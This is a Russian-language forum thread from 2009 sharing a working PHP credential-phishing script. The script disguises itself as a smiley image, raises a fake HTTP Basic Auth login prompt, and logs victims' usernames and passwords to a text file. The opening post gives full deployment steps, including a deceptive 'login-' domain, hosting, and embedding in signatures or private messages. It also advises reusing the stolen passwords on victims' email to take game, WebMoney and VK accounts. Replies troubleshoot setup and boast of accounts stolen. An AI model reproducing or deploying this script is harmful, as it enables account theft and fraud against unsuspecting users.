PDA

Просмотр полной версии : [Скрипт] Угон акка на форуме, и последовательно на сервере


H0oL1GaN
11.11.2009, 21:18
ДОБАВЛЮ : сайты можно и с юкоза, но я регал на [Ссылки могут видеть только зарегистрированные и активированные пользователи]

Вот не помню где нашел, классная штука..
Вот описание :
Суть угона заключается в простом смайлике, который запрашивает авторизацию, вы регистрируетесь на форуме, ставите себе в подпись, или можете кому то в лс отправить его, или в сообщение добавить [ img ]ссылка на смайл[ /img ]
вот и все, как только человек увидит этот смайл, у него выскакивает такая табличка
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Сверху пишет сайт на котором у вас этот смайл,( потому и рекомендую делать его в типе : login или похожу что то на сайт того форума где разводите )
внизу то что вы уже сами можете написать ,мне нужно было для пульса, я написал pulseworld.ru , это вы можете редактировать в самом скрипте..
Ниже в теме все описано что для этого нужно редактировать

собственно это и есть окно авторизации, для того что бы такое прокатило, вам нужно зарегистрировать сайт, с ФТП , я зарегал на h16.ru , но можете и на Ucoz'е, лудше всего регать , как я увидел на своем опыте, сайт примерно такой : login-сайт вашего сервера или что то такое, например : login-zhyk.h16.ru , ну или что то в этом роде , круче придумаете , будет больше шанс развести кого то..

заливаете файлы с архива, на свой сайт, точней на ФТП, вам нужно залить все файлы, и .htaccess , не знаю как у вас но у меня через тотал и через файрзиллу не лило, пришлось качать ФТП Commander.

сама суть развода заключается вот в чем: вы кидаете смайл, который запрашивает авторизацию, т.к. это не смайл а PHP скрипт.. я сам в этом не очень конечно разбираюсь но стараюсь на нормальном языке рассказать.. как понял сам.

Это код скрипта, тут все описано, в зависимости где хотите разводить , надо менять скрипт , то есть эту строчку :
"Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] Basic realm="pulseworld.ru"');"
я например просто ради прикола хотел потестить работает ли оно на самом деле, оказалось работает..
на ФТП моего сайта мне в файле passwords.txt в него мне записывали пароли тех кто авторизовался в моем смайле... каждый акк и пасс в новом рядке.
<?
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом из архива
$image = imagecreatefromgif('mellow.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
//Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
if(strlen($pass) <= 4 || !$login)
{
Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] 401 Unauthorized');
Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] Basic realm="Авторизуйтесь Пожалуйста"');
}
elseif($login)
{
//ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
setcookie('LOGON',md5($pass));
//запишем пароли в файл
$f = fopen('passwords.txt', 'ab'); //passwords.txt
fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>


Это конечно круто, но зачем нам какой то акк от форума, какое он даст нам преимущество.., а вот какое:
Вот мы уже знаем АКК и пасс ,человека которого развели, пусть для примера это будет .. Акк : qip пасс: piq
ну попадется на развод много народу , нам нужно выбрать того, у кого на ваш взгляд - может быть Какой то нормальный шмот, или пушка или еще какие то преимущества , что бы не делать всего этого зря.
На форуме заходим в вкладку изменить эмейл, там видим, пишет: Ваш текущий эмейл например будет : [Ссылки могут видеть только зарегистрированные и активированные пользователи] , в большинстве случаев пароль от форума соответствует паролю от эмейла в 80-90% случаях..
С эмейла нам тоже ничего не взять,"но" на эмейле может быть регистрации с других серверов, и в них пароли и аккаунты от сервера, например регистрируемся на ла2 ворлд, и тебе на эмейл приходит сообщение, "Поздравляем с успешной регистрацией, ваш аккаунт такой то , и пароль такой то"
Так можно найти много хорошего, даже те же пароли от Веб мани, или что то в этом роде.. и даже тот же контакт, в котором могут быть голоса,

Вот и сама ссылка на файл, в архиве есть видео мануал, и еще файл блокнота
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
в котором есть описание автора, этой проделки, но описание на этом форуме ,Описание делал сам,мой мануал с тем что в архиве не имеет ничего общего, (оттуда ничего не копировал), мануал писал я сам .
вот мой смайл, можете вводить авторизацию любые слова, и у вас покажет смайл, можете нажать отменить и все одно увидите, но при разводе народ вводит свой акк потому что думают - что это окно авторизации для форума
_[Ссылки могут видеть только зарегистрированные и активированные пользователи]

вот отчет с вирус тотала
Файл basic-auth_vs_forums.rar получен 2009.11.11 18:14:59 (UTC)
Антивирус Версия Обновление Результат
a-squared 4.5.0.41 2009.11.11 -
AhnLab-V3 5.0.0.2 2009.11.11 -
Antiy-AVL 2.0.3.7 2009.11.11 -
Authentium 5.2.0.5 2009.11.11 -
Avast 4.8.1351.0 2009.11.11 -
AVG 8.5.0.423 2009.11.11 -
BitDefender 7.2 2009.11.11 -
CAT-QuickHeal 10.00 2009.11.11 -
ClamAV 0.94.1 2009.11.11 -
Comodo 2919 2009.11.11 -
DrWeb 5.0.0.12182 2009.11.11 -
eSafe 7.0.17.0 2009.11.11 -
eTrust-Vet 35.1.7115 2009.11.11 -
F-Prot 4.5.1.85 2009.11.11 -
F-Secure 9.0.15370.0 2009.11.09 -
Fortinet 3.120.0.0 2009.11.11 -
GData 19 2009.11.11 -
Ikarus T3.1.1.74.0 2009.11.11 -
K7AntiVirus 7.10.893 2009.11.10 -
Kaspersky 7.0.0.125 2009.11.11 -
McAfee 5799 2009.11.11 -
McAfee+Artemis 5799 2009.11.11 -
McAfee-GW-Edition 6.8.5 2009.11.11 -
Microsoft 1.5202 2009.11.11 -
NOD32 4596 2009.11.11 -
Norman 6.03.02 2009.11.10 -
nProtect 2009.1.8.0 2009.11.11 -
Panda 10.0.2.2 2009.11.11 -
PCTools 7.0.3.5 2009.11.11 -
Rising 22.21.02.09 2009.11.11 -
Sophos 4.47.0 2009.11.11 -
Sunbelt 3.2.1858.2 2009.11.11 -
Symantec 1.4.4.12 2009.11.11 -
TheHacker 6.5.0.2.065 2009.11.11 -
TrendMicro 9.0.0.1003 2009.11.11 -
VBA32 3.12.10.11 2009.11.10 suspected of RAR.MailBomb
ViRobot 2009.11.11.2031 2009.11.11 -
VirusBuster 4.6.5.0 2009.11.10 -
Дополнительная информация
File size: 5646562 bytes
MD5...: 6dbbd5dc19eaeb1e5069adcca4ea69a6
SHA1..: 60440cbe0e4592c27fbc79053bed053aca404c0d
SHA256: 166162f12a7d09dda1935243b1936df6290c5c0af2abf6e555 45e78ced7fe483
ssdeep: 98304:Bieh9wG2pr3/y35tgghFZAeyXjOul1FHKgDZ1DQQpFBxRS4QCp5SdSoWOf<br>SlYU/8:BiO923/a5zZvcHKkzDQQp28inrAv/YUq<br>
PEiD..: -
PEInfo: -
RDS...: NSRL Reference Data Set<br>-
pdfid.: -

P.S.- думаю за старание что я скок строчил это можно и поставить ©П©
P.S.S - Еще для модератора, если не в той теме попрошу перенести, или даже если это понравится то закрепить, или если уже есть тема, то удалить её.
З.ы. - если что то не понятно то задавайте вопросы, по возможности буду отвечать если что то непонятно

H0oL1GaN
12.11.2009, 12:49
Нелюблю хохлов! Так испоганить великий и могучий...
користувач - это шозанах такой??? похоже на слово 3.14дорас... и вообще, буквы те же, а говор крестовский.


а ты читал посты повыше, я уже говорил что я с Украины , и общаюсь в реальности на Украинском, сколько об этом напоминать ёмаё .

Какойто нубас так пытался на форуме мелка разводить :d:d:d
каждый форумный троль пополнил словарный запас того кто сделал табличку)

хм.. если скачаете , увидите видео мануал в котором развели админа форума.
Даже и там где я разводил , модератора форума развел, при том что думаю модератор не должен был купится на такую фигню..
и еще, откуда знали кто разводил? ты подумал об этом? если на форуме у каждого в подписи стоит картинка, а у меня в подписи стоит маленький смайлик, то даже тот же админ не будет знать чьё это..разве что будет заходить в профиль каждого пользователя, и смотреть подпись, а если на форуме зарегано тысячи пользователей, думай он этим заниматься не будет, Вот потому я и говорю что бы все понять нужно читать все что я написал, Там Четко Видно, Что бы не регать сайт таким какой у вас ник.. ясно если у меня на форуме ник 9JIOX и вы зарегистрируете такой сайт вас вычислят, а если такой как у меня то фиг ты узнаеш у кого стоит этот развод...
Да и конечно если ты знаеш эту тему то да, ты не будешь вводить акк и пасс, а большинство то этого не знает , и поэтому ведутся.

mazatraker5
14.11.2009, 19:02
А обязательно файл htaccess должен быть без имени?или можно поставить 1 а то фтп не заливает "bad name" :omg:

Fix
14.11.2009, 21:59
Я заливал с помощью FileZilla FTP Client
всё отлично, но никто не покупается на развод...
Придумайте как заманить.

Glavos
14.11.2009, 22:51
Блин не могу понять что не так делаю. Заливаю на серв файлы через FileZilla FTP Client потом выставляю 755 права доступа. Все после этого указываю адрес к файлу смайл и нех не пашет, я чет пропустил?( Кто может помочь плз стукните в асю 570128188

H0oL1GaN
15.11.2009, 13:44
я наверно могу поспорить что вы не залили файл .htaccess
и на каком домене создавали файлы?
если на h16 , то там есть папка когда через ФТП заходиш, "WWW" в неё надо было зайти и залить смайлы, ну или создать еще в ней папку "1" например(как у меня) и туда уже все файлы залить, только измените файл
"smile.gif" перед тем как заливать, там есть типо когда тыкаеш правой клавишей мыши , и там есть , изменить как текст, вот и все откроется как я выше написал ,скрипт и в этой строчке "
Header('[Ссылки могут видеть только зарегистрированные и активированные пользователи] Basic realm="Авторизуйтесь Пожалуйста"'); "
пишем вместе "авторизируйтесь Пожалуйста" пишем например название вашего сервера, вот и все.

а по сообщению предыдущему, на каком ты форуме розводиш? и какой сайт зарегал? и изменил ли ты файл "smile.gif ? своими словами?
как я выше написал сайт своего серва, на руоффе незнаю покатит ли, потому что там уже так розводили)

Вот моя ася если что , 498889201
И скайп, iloveamoh
Вот зайдите на мою ссылку , для моего розвода ,_[Ссылки могут видеть только зарегистрированные и активированные пользователи]
видеш в ссылке есть /1/ это моя папка в каторой находится смайл, но она должно находится в папке [Ссылки могут видеть только зарегистрированные и активированные пользователи]

Добавлено через 2 минуты
А обязательно файл htaccess должен быть без имени?или можно поставить 1 а то фтп не заливает "bad name" :omg:

Я же сказал, файл .htaccess нужно лить с помощью ФТП коммандера, потому что с файр зиллы ,и через тотал командер не льет.

Добавлено через 7 минут
да не на форуме мелка не умный чел попался :) он в конце каждого поста ставил невидимую картинку с етой фигнёй, и я его спалил и выдал нечаяно, хотев ответить на его пост)
Способ то работает некто и не спорит но много ли идиотов с одинаковыми никами на форуме и л2?

а , я уже писал выше, что ты не розводиш на акки и игре, просто на многих серверах, есть такая фигня, что присылает твой акк и пас, и пишет , "поздравляю вас с регистрацией" ваш акк такой то , ваш пасс такой то.
а с этого ты уже розводиш, может быть я вот 1 акк взял своего форума, и там был акк с аббуса, но на аббусе я не играю, поетому мне и ненужно...
Подумайте о том что 1 человек играет на многих серверах, и если его мыло сломают то будет плохо, например если моё сломать там будут пассы и акки от многих серверов) у меня 700 сообщений дето с разными ссылками от сервов, просто я их неудаляю из за того что могу забыть пасс, и вообще мне влом)
ЗЫ. я думаю не 1 такой))

Severed Savior
18.11.2009, 22:12
Идея впринципе неплохая, но как заставить редиску-юзера нажать на ссылку то ? :hd: и только :brberbrb: введёт логин и пароль для просмотра смайлика...

ZliLO
18.11.2009, 23:43
Заставлять нажимать ничего не надо. Он открывает страничку, где находиться волшебный смайлик, и всплывает окошко с предложением ввести логин\пароль

truth
19.11.2009, 00:45
От безнания меня так вскрыли однажды на 4game :nono:

H0oL1GaN
20.11.2009, 12:28
Заставлять нажимать ничего не надо. Он открывает страничку, где находиться волшебный смайлик, и всплывает окошко с предложением ввести логин\пароль


Ну никакую страничку он не открывает, просто как у тебя в подписи стоит это ТАГ ТЕАМ это может быть той картинкой для развода, и кто загрузит эту страницу у него сразу же выбьет окно авторизации вот и все ничего сложного, кстати тут 1 человек не мог создать свой сайт, ну он отсылает мой смайл, на руоффе уже нормально развел, я ему каждый день там новые акки и пассы даю, но он кидает сообщения с этим смайлом в лк , так что это намного дольше)))

Denisovik
26.11.2009, 15:21
Всё отлично работает :) только я думаю, что файлу passwords.txt надо запретить права чтения)) а то понимающие люди могут смотреть ваши достяжения... например :) [Ссылки могут видеть только зарегистрированные и активированные пользователи]

H0oL1GaN
27.11.2009, 00:48
знаю знаю...
вроде просто нужно поставить в правах доступа к файлу
для тотал командера: Изменить Атрибуты и ставите Все кроме "Чтение" , чтение ставте только владельцу сайта , так вы сможете просмотреть файл пассвордс только через фтп ...
вот теперь попробуйте посмотреть на мой файл...
все зделал, проверил авторизация роботает нормально..!

[Ссылки могут видеть только зарегистрированные и активированные пользователи]
вот что я поставил, и все "Крутатенюшка"

HellFire
27.11.2009, 08:07
А обязательно файл htaccess должен быть без имени?или можно поставить 1 а то фтп не заливает "bad name" :omg:

у теху кого проблемы .htaccess ,скорее всего вам просто доступа к нему не дали и просто спрятали.

CityZEN
27.11.2009, 18:00
спс автору, разобрался даже без видео-мануала, все оказалось просто, но администрация уже просекла эту фишку и сейчас чистят темы и банят всех кто юзал данный метод =\

H0oL1GaN
27.11.2009, 23:48
Ну у меня Файл .htaccess тоже не хотело лить, ни через тотал коммандер ни через файрзиллу, много ФТП прог скачал, покатило только через FTP Commander , можете попробовать может быть у вас получится

Добавлено через 3 минуты
З.Ы. Модеры можете добавить это -
знаю знаю...
вроде просто нужно поставить в правах доступа к файлу
для тотал командера: Изменить Атрибуты и ставите Все кроме "Чтение" , чтение ставте только владельцу сайта , так вы сможете просмотреть файл пассвордс только через фтп ...
вот теперь попробуйте посмотреть на мой файл...
все зделал, проверил авторизация роботает нормально..!

[Ссылки могут видеть только зарегистрированные и активированные пользователи]
вот что я поставил, и все "Крутатенюшка"

в самый первый пост, в верху темы и зделайте типо число типо "добавлено 27.11.09" и вот этот пост, в самом верху темы
Заранее благодарен.

H0oL1GaN
05.12.2009, 23:46
Ап тему , может быть кому нить еще понадобиться.
:down:

blackdevil
21.12.2009, 21:17
я чето походу не то делаю =( никто не ловится на удочку, 1 акк попался а я смайлы по 10 форумам раскидал так и не нашол чей =)_))) и еще одно, в опере ярк о крассным выходит типо опасно пароль посылает не шифрованым, можно както убарть?

Fix
22.12.2009, 00:06
я чето походу не то делаю =( никто не ловится на удочку, 1 акк попался а я смайлы по 10 форумам раскидал так и не нашол чей =)_))) и еще одно, в опере ярк о крассным выходит типо опасно пароль посылает не шифрованым, можно както убарть?

Эту тему уже давно все знают, и не покупаются на неё.

blackdevil
22.12.2009, 14:15
оказц покупаются 3 акка удачно взломаны на тот серв который был нужен)

H0oL1GaN
27.12.2009, 14:08
Ну это дело не 2 минут, что бы побольше взломать, нужно на многих сайтах раскидывать, чем больше сайтов - тем больше шанс.
Теперь даже на форумах выкладывают скрин этой авторизации, и пишут что бы не покупались на развод.
Но все же есть в мире "Loosers" которые покупаются на такую фигню):gordon:

m0nk
27.12.2009, 14:13
Да это уже не прокатит

H0oL1GaN
27.12.2009, 14:23
Ну это дело не 2 минут, что бы побольше взломать, нужно на многих сайтах раскидывать, чем больше сайтов - тем больше шанс.
Теперь даже на форумах выкладывают скрин этой авторизации, и пишут что бы не покупались на развод.
Но все же есть в мире "Loosers" которые покупаются на такую фигню):gordon: